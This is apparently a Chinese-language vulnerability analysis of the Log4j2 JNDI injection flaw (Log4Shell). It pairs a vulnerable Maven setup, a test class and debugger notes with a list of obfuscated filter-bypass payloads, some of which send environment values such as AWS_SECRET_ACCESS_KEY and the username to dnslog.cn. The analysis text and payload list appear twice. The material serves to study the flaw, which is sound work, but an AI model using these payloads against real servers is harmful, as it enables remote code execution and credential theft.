maven环境
测试类
java
环境整体结构
upload successful
发现i为7的时候有执行
upload successful
步进查看
upload successful
判断是否是 Log4j2 的 lookups 功能,我们是有的,继续下走,判断workingBuilder 中是否存在 ${,存在进行截取,然后进行 replace()方法
upload successful
upload successful
跟进 replace() 方法看看
upload successful
upload successful
upload successful
一直步进找业务逻辑,substitute前面都是赋值,只需要关心我们payload的变化就行。
while循环读取将 ${} 中间的内容取出来
upload successful
然后会再次进入substitute,传入的buf没有${}了
upload successful
步进resolveVariable函数
upload successful
resolveVariable里面调用了lookup,继续跟进,最终在jndiManager.lookup调用
upload successful
jndiManager lookup调用this.context的,JndiManagerFactory 来创建 JndiManager
upload successful
看下JndiManagerFactory
upload successful
创建InitialContext 实例,返回一个JndiManager对象
JndiManager就是最终触发的位置,后面就是jndi注入的问题了
${jnd${upper:ı}:ldap://[127.0.0.1]]/mESHFnWc} jndi要开389
xml
${jnd${upper:\u0131}:ldap://[127.0.0.1]]/KWhsLxIC}
upload successful
${${qax:-j${qax-::qax::-n}}${lower:${upper:d}}${upper:ı}:ldap://127.0.0.1:8086/mhStyxHU}
${jndi:ldap://${env:USER}.dnslog.cn}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.dnslog.cn}
${jndi:ldap://${java:version}.u2xf5m.dnslog.cn}
${bundle:application:spring.datasource.password}
代码:
xml
<span><span><span><</span>project</span> <span>xmlns</span><span><span>=</span><span>"</span>http://maven.apache.org/POM/4.0.0<span>"</span></span> <span><span>xmlns:</span>xsi</span><span><span>=</span><span>"</span>http://www.w3.org/2001/XMLSchema-instance<span>"</span></span><br> <span><span>xsi:</span>schemaLocation</span><span><span>=</span><span>"</span>http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd<span>"</span></span><span>></span></span><br> <span><span><span><</span>modelVersion</span><span>></span></span>4.0.0<span><span><span></</span>modelVersion</span><span>></span></span><br><br> <span><span><span><</span>groupId</span><span>></span></span>top.lnng.log4j2<span><span><span></</span>groupId</span><span>></span></span><br> <span><span><span><</span>artifactId</span><span>></span></span>log4j2<span><span><span></</span>artifactId</span><span>></span></span><br> <span><span><span><</span>version</span><span>></span></span>1.0-SNAPSHOT<span><span><span></</span>version</span><span>></span></span><br> <span><span><span><</span>packaging</span><span>></span></span>jar<span><span><span></</span>packaging</span><span>></span></span><br><br> <span><span><span><</span>name</span><span>></span></span>log4j2<span><span><span></</span>name</span><span>></span></span><br> <span><span><span><</span>url</span><span>></span></span>http://maven.apache.org<span><span><span></</span>url</span><span>></span></span><br><br> <span><span><span><</span>properties</span><span>></span></span><br> <span><span><span><</span>project.build.sourceEncoding</span><span>></span></span>UTF-8<span><span><span></</span>project.build.sourceEncoding</span><span>></span></span><br> <span><span><span></</span>properties</span><span>></span></span><br><br> <span><span><span><</span>dependencies</span><span>></span></span><br> <span><span><span><</span>dependency</span><span>></span></span><br> <span><span><span><</span>groupId</span><span>></span></span>org.apache.logging.log4j<span><span><span></</span>groupId</span><span>></span></span><br> <span><span><span><</span>artifactId</span><span>></span></span>log4j-core<span><span><span></</span>artifactId</span><span>></span></span><br> <span><span><span><</span>version</span><span>></span></span>2.14.1<span><span><span></</span>version</span><span>></span></span><br> <span><span><span></</span>dependency</span><span>></span></span><br> <span><span><span><</span>dependency</span><span>></span></span><br> <span><span><span><</span>groupId</span><span>></span></span>org.apache.logging.log4j<span><span><span></</span>groupId</span><span>></span></span><br> <span><span><span><</span>artifactId</span><span>></span></span>log4j-api<span><span><span></</span>artifactId</span><span>></span></span><br> <span><span><span><</span>version</span><span>></span></span>2.14.1<span><span><span></</span>version</span><span>></span></span><br> <span><span><span></</span>dependency</span><span>></span></span><br> <span><span><span><</span>dependency</span><span>></span></span><br> <span><span><span><</span>groupId</span><span>></span></span>junit<span><span><span></</span>groupId</span><span>></span></span><br> <span><span><span><</span>artifactId</span><span>></span></span>junit<span><span><span></</span>artifactId</span><span>></span></span><br> <span><span><span><</span>version</span><span>></span></span>3.8.1<span><span><span></</span>version</span><span>></span></span><br> <span><span><span><</span>scope</span><span>></span></span>test<span><span><span></</span>scope</span><span>></span></span><br> <span><span><span></</span>dependency</span><span>></span></span><br> <span><span><span></</span>dependencies</span><span>></span></span><br> <span><span><span><</span>build</span><span>></span></span><br> <span><span><span><</span>plugins</span><span>></span></span><br> <span><span><span><</span>plugin</span><span>></span></span><br> <span><span><span><</span>groupId</span><span>></span></span>org.apache.maven.plugins<span><span><span></</span>groupId</span><span>></span></span><br> <span><span><span><</span>artifactId</span><span>></span></span>maven-compiler-plugin<span><span><span></</span>artifactId</span><span>></span></span><br> <span><span><span><</span>configuration</span><span>></span></span><br> <span><span><span><</span>source</span><span>></span></span>8<span><span><span></</span>source</span><span>></span></span><br> <span><span><span><</span>target</span><span>></span></span>8<span><span><span></</span>target</span><span>></span></span><br> <span><span><span></</span>configuration</span><span>></span></span><br> <span><span><span></</span>plugin</span><span>></span></span><br> <span><span><span></</span>plugins</span><span>></span></span><br> <span><span><span></</span>build</span><span>></span></span><br><span><span><span></</span>project</span><span>></span></span>
log4j2.xml
代码:
xml
<span><?xml version="1.0" encoding="UTF-8"?></span><br><br><span><span><span><</span>configuration</span> <span>status</span><span><span>=</span><span>"</span>info<span>"</span></span><span>></span></span><br> <span><span><span><</span>Properties</span><span>></span></span><br> <span><span><span><</span>Property</span> <span>name</span><span><span>=</span><span>"</span>pattern1<span>"</span></span><span>></span></span>[%-5p] %d %c - %m%n<span><span><span></</span>Property</span><span>></span></span><br> <span><span><span><</span>Property</span> <span>name</span><span><span>=</span><span>"</span>pattern2<span>"</span></span><span>></span></span><br> =========================================%n 日志级别:%p%n 日志时间:%d%n 所属类名:%c%n 所属线程:%t%n 日志信息:%m%n<br> <span><span><span></</span>Property</span><span>></span></span><br> <span><span><span><</span>Property</span> <span>name</span><span><span>=</span><span>"</span>filePath<span>"</span></span><span>></span></span>logs/myLog.log<span><span><span></</span>Property</span><span>></span></span><br> <span><span><span></</span>Properties</span><span>></span></span><br> <span><span><span><</span>appenders</span><span>></span></span> <span><span><span><</span>Console</span> <span>name</span><span><span>=</span><span>"</span>Console<span>"</span></span> <span>target</span><span><span>=</span><span>"</span>SYSTEM_OUT<span>"</span></span><span>></span></span><br> <span><span><span><</span>PatternLayout</span> <span>pattern</span><span><span>=</span><span>"</span>${pattern1}<span>"</span></span><span>/></span></span><br> <span><span><span></</span>Console</span><span>></span></span> <span><span><span><</span>RollingFile</span> <span>name</span><span><span>=</span><span>"</span>RollingFile<span>"</span></span> <span>fileName</span><span><span>=</span><span>"</span>${filePath}<span>"</span></span><br> <span>filePattern</span><span><span>=</span><span>"</span>logs/$${date:yyyy-MM}/app-%d{MM-dd-yyyy}-%i.log.gz<span>"</span></span><span>></span></span><br> <span><span><span><</span>PatternLayout</span> <span>pattern</span><span><span>=</span><span>"</span>${pattern2}<span>"</span></span><span>/></span></span><br> <span><span><span><</span>SizeBasedTriggeringPolicy</span> <span>size</span><span><span>=</span><span>"</span>5 MB<span>"</span></span><span>/></span></span><br> <span><span><span></</span>RollingFile</span><span>></span></span><br> <span><span><span></</span>appenders</span><span>></span></span><br> <span><span><span><</span>loggers</span><span>></span></span><br> <span><span><span><</span>root</span> <span>level</span><span><span>=</span><span>"</span>info<span>"</span></span><span>></span></span><br> <span><span><span><</span>appender-ref</span> <span>ref</span><span><span>=</span><span>"</span>Console<span>"</span></span><span>/></span></span><br> <span><span><span><</span>appender-ref</span> <span>ref</span><span><span>=</span><span>"</span>RollingFile<span>"</span></span><span>/></span></span><br> <span><span><span></</span>root</span><span>></span></span><br> <span><span><span></</span>loggers</span><span>></span></span><br><span><span><span></</span>configuration</span><span>></span></span>
java
JavaScript:
<span>public</span> <span>class</span> <span>App</span> <span>{</span><br> <span>public</span> <span>static</span> <span>void</span> <span>main</span><span>(</span>String<span>[</span><span>]</span> args<span>)</span> <span>{</span><br> Logger logger <span>=</span> LogManager<span>.</span><span>getLogger</span><span>(</span>LongFunction<span>.</span><span>class</span><span>)</span><span>;</span><br> String username <span>=</span> <span>"${jndi:ldap://127.0.0.1:8085/GFxElmpt}"</span><span>;</span><br> logger<span>.</span><span>info</span><span>(</span><span>"User {} login in!"</span><span>,</span> username<span>)</span><span>;</span><br> <span>}</span><br><span>}</span>
upload successful
不停的的下断点定位触发位置发现i为7的时候有执行
upload successful
步进查看
upload successful
判断是否是 Log4j2 的 lookups 功能,我们是有的,继续下走,判断workingBuilder 中是否存在 ${,存在进行截取,然后进行 replace()方法
upload successful
upload successful
跟进 replace() 方法看看
upload successful
upload successful
upload successful
一直步进找业务逻辑,substitute前面都是赋值,只需要关心我们payload的变化就行。
while循环读取将 ${} 中间的内容取出来
upload successful
然后会再次进入substitute,传入的buf没有${}了
upload successful
步进resolveVariable函数
upload successful
resolveVariable里面调用了lookup,继续跟进,最终在jndiManager.lookup调用
upload successful
jndiManager lookup调用this.context的,JndiManagerFactory 来创建 JndiManager
upload successful
看下JndiManagerFactory
upload successful
创建InitialContext 实例,返回一个JndiManager对象
JndiManager就是最终触发的位置,后面就是jndi注入的问题了
- 先判断内容中是否有${},然后截取${}中的内容,得到我们的恶意payload jndi:xxx
- 后使用:分割payload,通过前缀来判断使用何种解析器去lookup
- 支持的前缀包括 date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j
${jndi:ldap://127.0.0.1:8085/GFxElmpt}${jnd${upper:ı}:ldap://[127.0.0.1]]/mESHFnWc} jndi要开389
xml
${jnd${upper:\u0131}:ldap://[127.0.0.1]]/KWhsLxIC}
upload successful
${${qax:-j${qax-::qax::-n}}${lower:${upper:d}}${upper:ı}:ldap://127.0.0.1:8086/mhStyxHU}
${jndi:ldap://${env:USER}.dnslog.cn}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.dnslog.cn}
${jndi:ldap://${java:version}.u2xf5m.dnslog.cn}
${bundle:application:spring.datasource.password}